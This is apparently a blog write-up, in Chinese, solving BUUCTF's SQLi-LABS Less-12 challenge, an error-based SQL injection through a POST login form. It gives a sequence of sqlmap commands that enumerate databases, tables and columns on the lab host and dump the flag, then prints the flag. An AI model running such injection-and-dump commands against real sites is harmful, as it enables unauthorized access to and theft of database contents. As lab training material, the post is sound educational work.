【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-12 Writeup(SQL注入+POST请求+报错注入+双引号闭合+字符型注入)

sqli-labs

1
点击启动靶机。

SQLi-LABS Page-1(Basic Challenges)


解法

随便提交一些数据。

审查元素。

<form action="" name="form1" method="post">
	<div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;
	    <input type="text" name="uname" value="">
	</div>  
	<div> Password  : &nbsp;&nbsp;&nbsp;
		<input type="text" name="passwd" value="">
	</div><br>
	<div style=" margin-top:9px;margin-left:90px;">
		<input type="submit" name="submit" value="Submit">
	</div>
</form>

根据表单构造 POST 请求体:

passwd=123456&submit=Submit&uname=admin

用 sqlmap 扫描:

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch

爆库名:

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E --dbs

爆表名:

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E -D ctftraining --tables

爆列名:

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E -D ctftraining -T flag --columns

查询 flag。

sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-12/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E -D ctftraining -T flag -C flag --dump

Flag

flag{6baf6140-4646-4f31-bb61-e42b13de98a1}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值